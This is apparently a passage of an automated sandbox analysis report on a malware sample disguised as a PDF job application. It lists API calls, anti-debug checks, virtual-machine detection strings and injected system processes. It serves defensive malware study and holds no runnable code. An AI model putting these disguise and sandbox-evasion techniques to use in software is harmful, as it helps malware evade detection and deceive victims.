            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00\4&
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00lnOlO
            Source: SensorDataService.exe, 00000018.00000002.1388042996.0000000000497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
            Source: SensorDataService.exe, 00000018.00000002.1388042996.0000000000497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KVMware Virtual U
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SensorDataService.exe, 00000018.00000002.1388042996.0000000000497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
            Source: SensorDataService.exe, 00000018.00000003.1288092880.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000018.00000003.1288385275.00000000004CA000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1307563922.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1827891446.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792760651.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1888241727.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1759623252.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1858688778.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1837228668.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1210936855.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SensorDataService.exe, 00000018.00000003.1288092880.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1307410618.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
            Source: Spectrum.exe, 0000001B.00000003.1307410618.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
            Source: Spectrum.exe, 0000001B.00000003.1307410618.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device~QO
            Source: Spectrum.exe, 0000001B.00000003.1307410618.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00L
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: AppVClient.exe, 00000007.00000002.1175132993.000000000062E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1173902079.0000000000610000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1173976401.0000000000617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine6
            Source: Spectrum.exe, 0000001B.00000003.1307410618.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,OSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: Spectrum.exe, 0000001B.00000002.2412380247.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, snmptrap.exe, 0000001A.00000002.2408470798.0000000000114000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SensorDataService.exe, 00000018.00000003.1288092880.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1307410618.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lOSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: 7EFPjTEjLAB4.exe, 00000026.00000002.2432208028.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186953502.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWn)tV
            Source: SensorDataService.exe, 00000018.00000003.1288845109.00000000004D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fMSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
            Source: Spectrum.exe, 0000001B.00000003.1307410618.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Deviceb.O
            Source: ssh-agent.exe, 0000001D.00000002.2415363781.0000000000427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluub9P
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1187226097.0000000000C41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exea
            Source: SensorDataService.exe, 00000018.00000003.1288845109.00000000004D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: SensorDataService.exe, 00000018.00000003.1288845109.00000000004D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OMSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SensorDataService.exe, 00000018.00000003.1288845109.00000000004D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
            Source: Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Device
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
            Source: SensorDataService.exe, 00000018.00000003.1288092880.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000018.00000003.1288385275.00000000004CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001B.00000002.2419378932.00000000004E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver$tN
            Source: Spectrum.exe, 0000001B.00000003.1308813682.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7096E rdtsc 3_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417D83 LdrLoadDll,3_2_00417D83
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00571FF8 mov eax, dword ptr fs:[00000030h]0_2_00571FF8
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00B37080 mov eax, dword ptr fs:[00000030h]0_2_00B37080
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00B370E0 mov eax, dword ptr fs:[00000030h]0_2_00B370E0
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00B35A60 mov eax, dword ptr fs:[00000030h]0_2_00B35A60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E388 mov eax, dword ptr fs:[00000030h]3_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E388 mov eax, dword ptr fs:[00000030h]3_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E388 mov eax, dword ptr fs:[00000030h]3_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5438F mov eax, dword ptr fs:[00000030h]3_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5438F mov eax, dword ptr fs:[00000030h]3_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A28397 mov eax, dword ptr fs:[00000030h]3_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A28397 mov eax, dword ptr fs:[00000030h]3_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A28397 mov eax, dword ptr fs:[00000030h]3_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A403E9 mov eax, dword ptr fs:[00000030h]3_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A663FF mov eax, dword ptr fs:[00000030h]3_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEC3CD mov eax, dword ptr fs:[00000030h]3_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A383C0 mov eax, dword ptr fs:[00000030h]3_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A383C0 mov eax, dword ptr fs:[00000030h]3_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A383C0 mov eax, dword ptr fs:[00000030h]3_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A383C0 mov eax, dword ptr fs:[00000030h]3_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB63C0 mov eax, dword ptr fs:[00000030h]3_2_03AB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE3DB mov eax, dword ptr fs:[00000030h]3_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE3DB mov eax, dword ptr fs:[00000030h]3_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]3_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE3DB mov eax, dword ptr fs:[00000030h]3_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD43D4 mov eax, dword ptr fs:[00000030h]3_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD43D4 mov eax, dword ptr fs:[00000030h]3_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B08324 mov eax, dword ptr fs:[00000030h]3_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B08324 mov ecx, dword ptr fs:[00000030h]3_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B08324 mov eax, dword ptr fs:[00000030h]3_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B08324 mov eax, dword ptr fs:[00000030h]3_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A30B mov eax, dword ptr fs:[00000030h]3_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A30B mov eax, dword ptr fs:[00000030h]3_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A30B mov eax, dword ptr fs:[00000030h]3_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C310 mov ecx, dword ptr fs:[00000030h]3_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A50310 mov ecx, dword ptr fs:[00000030h]3_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD437C mov eax, dword ptr fs:[00000030h]3_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov ecx, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFA352 mov eax, dword ptr fs:[00000030h]3_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD8350 mov ecx, dword ptr fs:[00000030h]3_2_03AD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0634F mov eax, dword ptr fs:[00000030h]3_2_03B0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402A0 mov eax, dword ptr fs:[00000030h]3_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402A0 mov eax, dword ptr fs:[00000030h]3_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E284 mov eax, dword ptr fs:[00000030h]3_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E284 mov eax, dword ptr fs:[00000030h]3_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0283 mov eax, dword ptr fs:[00000030h]3_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0283 mov eax, dword ptr fs:[00000030h]3_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0283 mov eax, dword ptr fs:[00000030h]3_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402E1 mov eax, dword ptr fs:[00000030h]3_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402E1 mov eax, dword ptr fs:[00000030h]3_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402E1 mov eax, dword ptr fs:[00000030h]3_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B062D6 mov eax, dword ptr fs:[00000030h]3_2_03B062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2823B mov eax, dword ptr fs:[00000030h]3_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34260 mov eax, dword ptr fs:[00000030h]3_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34260 mov eax, dword ptr fs:[00000030h]3_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34260 mov eax, dword ptr fs:[00000030h]3_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2826B mov eax, dword ptr fs:[00000030h]3_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB8243 mov eax, dword ptr fs:[00000030h]3_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB8243 mov ecx, dword ptr fs:[00000030h]3_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0625D mov eax, dword ptr fs:[00000030h]3_2_03B0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A250 mov eax, dword ptr fs:[00000030h]3_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36259 mov eax, dword ptr fs:[00000030h]3_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEA250 mov eax, dword ptr fs:[00000030h]3_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEA250 mov eax, dword ptr fs:[00000030h]3_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A70185 mov eax, dword ptr fs:[00000030h]3_2_03A70185
